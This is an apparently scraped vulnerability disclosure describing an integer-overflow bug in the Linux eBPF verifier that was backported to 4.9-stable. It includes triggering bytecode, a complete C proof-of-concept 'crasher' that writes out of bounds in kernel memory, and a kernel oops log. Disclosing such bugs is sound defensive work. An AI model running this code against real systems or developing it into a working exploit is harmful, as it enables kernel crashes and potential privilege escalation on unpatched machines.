eBPF had the verifier bug backported to version 4.9-stable.
8a1c22a5152b26d19ce1cffd65c19ab9
eBPF verifier bug backported to 4.9-stable
Moving this one to a separate bug report...
Commit <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=332270fdc8b6fba07d059a9ad44df9e1a2ad4529" title="" class="" rel="nofollow">https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=332270fdc8b6fba07d059a9ad44df9e1a2ad4529</a> adds functionality that permits performing addition on PTR_TO_STACK (stack pointer with fixed offset) instead of just on FRAME_PTR (stack pointer without offset). Because the logic for adding offsets doesn't check for overflow, the following eBPF bytecode passes the verifier, but performs an access that is around 4GiB out of bounds:
0: (b7) <a href="https://crrev.com/2" title="" class="" rel="nofollow">r2</a> = 0
1: (bf) <a href="https://crrev.com/1" title="" class="" rel="nofollow">r1</a> = <a href="https://crrev.com/10" title="" class="" rel="nofollow">r10</a>
2: (07) <a href="https://crrev.com/1" title="" class="" rel="nofollow">r1</a> += 2147483647
3: (07) <a href="https://crrev.com/1" title="" class="" rel="nofollow">r1</a> += 2147483647
4: (73) *(u8 *)(<a href="https://crrev.com/1" title="" class="" rel="nofollow">r1</a> +0) = <a href="https://crrev.com/2" title="" class="" rel="nofollow">r2</a>
5: (b4) (u32) <a href="https://crrev.com/0" title="" class="" rel="nofollow">r0</a> = (u32) 0
6: (95) exit
Unfortunately, this commit was backported to the 4.9 stable tree (<a href="https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=7bca0a9702edfc8d0e7e46f984ca422ffdbe0498" title="" class="" rel="nofollow">https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=7bca0a9702edfc8d0e7e46f984ca422ffdbe0498</a> , first contained in v4.9.28), so this crasher works both against a fully updated Debian stable system (distro kernel, release 4.9.0-4-amd64, version "#1 SMP Debian 4.9.51-1 (2017-09-28)") and against a kernel built from the current net tree.
Full crasher:
======================
#define _GNU_SOURCE
#include <err.h>
#include <stdint.h>
#include <linux/bpf.h>
#include <linux/filter.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <asm/unistd_64.h>
#include <sys/types.h>
#include <sys/socket.h>
/* start from kernel */
#define BPF_EMIT_CALL(FUNC) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_CALL, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = (FUNC) }) /* ??? */
#define BPF_MOV32_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_REG_ARG1 BPF_REG_1
#define BPF_REG_ARG2 BPF_REG_2
#define BPF_REG_ARG3 BPF_REG_3
#define BPF_REG_ARG4 BPF_REG_4
#define BPF_REG_ARG5 BPF_REG_5
#define BPF_PSEUDO_MAP_FD 1
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
((struct bpf_insn) { \
.code = BPF_LD | BPF_DW | BPF_IMM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = (__u32) (IMM) }), \
((struct bpf_insn) { \
.code = 0, /* zero is reserved opcode */ \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = ((__u64) (IMM)) >> 32 })
#define BPF_ALU32_IMM(OP, DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_LD_MAP_FD(DST, MAP_FD) \
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)
#define BPF_ALU32_REG(OP, DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_OP(OP) | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_EXIT_INSN() \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_EXIT, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = 0 })
/* Memory store, *(uint *) (dst_reg + off16) = src_reg */
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_REG_FP BPF_REG_10
#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_ALU64_IMM(OP, DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_REG_TMP BPF_REG_8
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
#define BPF_MOV64_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_ALU64_REG(OP, DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_MOV32_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
/* end from kernel */
int bpf_(int cmd, union bpf_attr *attrs) {
return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}
void array_set(int mapfd, uint32_t key, uint32_t value) {
union bpf_attr attr = {
.map_fd = mapfd,
.key = (uint64_t)&key,
.value = (uint64_t)&value,
.flags = BPF_ANY,
};
int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);
if (res)
err(1, "map update elem");
}
int main(void) {
union bpf_attr create_map_attrs = {
.map_type = BPF_MAP_TYPE_ARRAY,
.key_size = 4,
.value_size = 8,
.max_entries = 16
};
int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);
if (mapfd == -1)
err(1, "map create");
array_set(mapfd, 1, 1);
char verifier_log[100000];
struct bpf_insn insns[] = {
/*
BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
// fill <a href="https://crrev.com/3" title="" class="" rel="nofollow">r3</a> with value in range [0x0, 0xf], actually 0x8:
// first load map value pointer...
BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack
BPF_MOV32_IMM(BPF_REG_ARG2, 1),
BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),
BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),
BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit
BPF_EXIT_INSN(), // exit
// ... then write, read, mask map value
// (tracing actual values through a map is impossible)
BPF_MOV32_IMM(BPF_REG_3, 8),
BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_3, 0),
BPF_LDX_MEM(BPF_W, BPF_REG_3, BPF_REG_0, 0),
BPF_ALU64_IMM(BPF_AND, BPF_REG_3, 0xf),
// negate
BPF_MOV64_IMM(BPF_REG_4, 0),
// <a href="https://crrev.com/4" title="" class="" rel="nofollow">r4</a> = [-0xf, 0x0]
BPF_ALU64_REG(BPF_SUB, BPF_REG_4, BPF_REG_3),
// <a href="https://crrev.com/5" title="" class="" rel="nofollow">r5</a> = fp
BPF_MOV64_REG(BPF_REG_5, BPF_REG_10),
// <a href="https://crrev.com/5" title="" class="" rel="nofollow">r5</a> = fp - 4
BPF_ALU64_IMM(BPF_ADD, BPF_REG_5, -4),
BPF_STX_MEM(BPF_W, BPF_REG_5, BPF_REG_4, 0),
// <a href="https://crrev.com/5" title="" class="" rel="nofollow">r5</a> = fp - 4 - [0x0, 0xf]
BPF_ALU64_REG(BPF_ADD, BPF_REG_5, BPF_REG_4),
BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_5),
BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
*/
// zero register
BPF_MOV64_IMM(BPF_REG_2, 0),
// copy fp
BPF_MOV64_REG(BPF_REG_1, BPF_REG_10),
// adjust fp up maximally (0x7fff'ffff),
// resulting in an sp
BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 0x7fffffff),
// ... and now, thanks to 7bca0a9702edf, we get
// to do that again! this will wrap to negative
// in the verifier.
BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 0x7fffffff),
// now store some stuff 4GB out of bounds
BPF_STX_MEM(BPF_B, BPF_REG_1, BPF_REG_2, 0),
// terminate to make the verifier happy
BPF_MOV32_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN()
};
union bpf_attr create_prog_attrs = {
.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
.insn_cnt = sizeof(insns) / sizeof(insns[0]),
.insns = (uint64_t)insns,
.license = (uint64_t)"",
.log_level = 2,
.log_size = sizeof(verifier_log),
.log_buf = (uint64_t)verifier_log
};
int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
puts(verifier_log);
if (progfd == -1) {
perror("prog load");
return 1;
}
puts("ok so far?");
int socks[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))
err(1, "socketpair");
if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
err(1, "setsockopt");
if (write(socks[1], "a", 1) != 1)
err(1, "write");
char c;
if (read(socks[0], &c, 1) != 1)
err(1, "read res");
return 0;
}
======================
Crash example with a Debian stable distro kernel (note the pointer in RCX that points roughly 4GiB behind RSP):
======================
[ 51.597474] BUG: unable to handle kernel paging request at ffffa97bc214fcbe
[ 51.597478] IP: [<ffffffff96d5bd46>] __bpf_prog_run+0xb46/0x11e0
[ 51.597490] PGD 2370a0067
[ 51.597490] PUD 0
[ 51.597493] Oops: 0002 [#1] SMP
[ 51.597495] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm qxl snd_timer ttm snd soundcore drm_kms_helper pcspkr evdev ppdev serio_raw drm parport_pc crct10dif_pclmul parport crc32_pclmul ghash_clmulni_intel virtio_console virtio_balloon sg binfmt_misc button ip_tables x_tables autofs4 ext4 crc16 jbd2 crc32c_generic fscrypto ecb mbcache sd_mod sr_mod cdrom ata_generic 8139too crc32c_intel aesni_intel aes_x86_64 glue_helper lrw gf128mul ablk_helper cryptd ata_piix ehci_pci uhci_hcd ehci_hcd libata virtio_pci psmouse virtio_ring usbcore 8139cp virtio scsi_mod usb_common mii i2c_piix4 floppy
[ 51.597517] CPU: 2 PID: 1106 Comm: crasher_double_ Not tainted 4.9.0-4-amd64 #1 Debian 4.9.51-1
[ 51.597518] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
[ 51.597519] task: ffff9a1bb3736100 task.stack: ffffa97ac214c000
[ 51.597519] RIP: 0010:[<ffffffff96d5bd46>] [<ffffffff96d5bd46>] __bpf_prog_run+0xb46/0x11e0
[ 51.597521] RSP: 0018:ffffa97ac214fa60 EFLAGS: 00010202
[ 51.597522] RAX: 0000000000000000 RBX: ffffa97ac0ebd050 RCX: ffffa97bc214fcbe
[ 51.597523] RDX: 0000000000000000 RSI: ffffa97ac0ebd028 RDI: ffff9a1bb577c900
[ 51.597523] RBP: ffffffff9741fb60 <a href="https://crrev.com/08" title="" class="" rel="nofollow">R08</a>: ffff9a1bb70006c0 <a href="https://crrev.com/09" title="" class="" rel="nofollow">R09</a>: ffff9a1bb3925000
[ 51.597524] <a href="https://crrev.com/10" title="" class="" rel="nofollow">R10</a>: ffff9a1bb18afc00 <a href="https://crrev.com/11" title="" class="" rel="nofollow">R11</a>: 0000000000000000 <a href="https://crrev.com/12" title="" class="" rel="nofollow">R12</a>: 0000000000000000
[ 51.597525] <a href="https://crrev.com/13" title="" class="" rel="nofollow">R13</a>: ffffa97ac0ebd000 <a href="https://crrev.com/14" title="" class="" rel="nofollow">R14</a>: 0000000000000000 <a href="https://crrev.com/15" title="" class="" rel="nofollow">R15</a>: 0000000000000001
[ 51.597526] FS: 00007fc6afade700(0000) GS:ffff9a1bbfc80000(0000) knlGS:0000000000000000
[ 51.597529] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 51.597530] CR2: ffffa97bc214fcbe CR3: 000000023100f000 CR4: 00000000001406e0
[ 51.597532] Stack:
[ 51.597533] 0000000000000000 00000000024280ca ffffa97bc214fcbe 0000000000000000
[ 51.597535] 00000000027080c0 ffffa97ac214faa0 ffffffff96d86956 ffff9a1bbfff9cc0
[ 51.597536] ffff9a1bbfff9cc0 ffffffffffffffff 00000000000000f0 ffffa97ac214fcc0
[ 51.597537] Call Trace:
[ 51.597544] [<ffffffff96d86956>] ? __alloc_pages_nodemask+0xf6/0x260
[ 51.597549] [<ffffffff96f485c9>] ? list_del+0x9/0x30
[ 51.597551] [<ffffffff96d83f66>] ? __rmqueue+0x96/0x400
[ 51.597555] [<ffffffff96c623bd>] ? __change_page_attr_set_clr+0x88d/0xda0
[ 51.597556] [<ffffffff96f485c9>] ? list_del+0x9/0x30
[ 51.597564] [<ffffffff970ebade>] ? __kmalloc_reserve.isra.35+0x2e/0x80
[ 51.597567] [<ffffffff96c47378>] ? native_send_call_func_ipi+0xe8/0xf0
[ 51.597568] [<ffffffff970ebade>] ? __kmalloc_reserve.isra.35+0x2e/0x80
[ 51.597570] [<ffffffff970ec8e6>] ? __alloc_skb+0x96/0x1e0
[ 51.597574] [<ffffffff96dfedba>] ? __check_object_size+0xfa/0x1d8
[ 51.597576] [<ffffffff96f3ef43>] ? copy_from_iter+0x93/0x370
[ 51.597580] [<ffffffff9711a3a9>] ? sk_filter_trim_cap+0x59/0x2a0
[ 51.597585] [<ffffffff971a9c66>] ? unix_dgram_sendmsg+0x276/0x720
[ 51.597587] [<ffffffff970e4880>] ? sock_sendmsg+0x30/0x40
[ 51.597588] [<ffffffff970e4917>] ? sock_write_iter+0x87/0x100
[ 51.597589] [<ffffffff96e0254a>] ? new_sync_write+0xda/0x130
[ 51.597590] [<ffffffff96e02cb0>] ? vfs_write+0xb0/0x190
[ 51.597592] [<ffffffff96e040a2>] ? SyS_write+0x52/0xc0
[ 51.597600] [<ffffffff972085bb>] ? system_call_fast_compare_end+0xc/0x9b
[ 51.597601] Code: 02 00 00 5b 5d 41 5c c3 0f b6 43 01 48 0f bf 53 02 48 83 c3 08 48 89 c1 c0 e8 04 83 e1 0f 83 e0 0f 48 8b 44 c4 08 48 8b 4c cc 08 <88> 04 11 0f b6 03 ff 64 c5 00 0f b6 43 01 48 0f bf 53 02 48 83
[ 51.597616] RIP [<ffffffff96d5bd46>] __bpf_prog_run+0xb46/0x11e0
[ 51.597618] RSP <ffffa97ac214fa60>
[ 51.597618] CR2: ffffa97bc214fcbe
[ 51.597620] ---[ end trace f23ad85c8b2cbd27 ]---
======================
Found by: jannh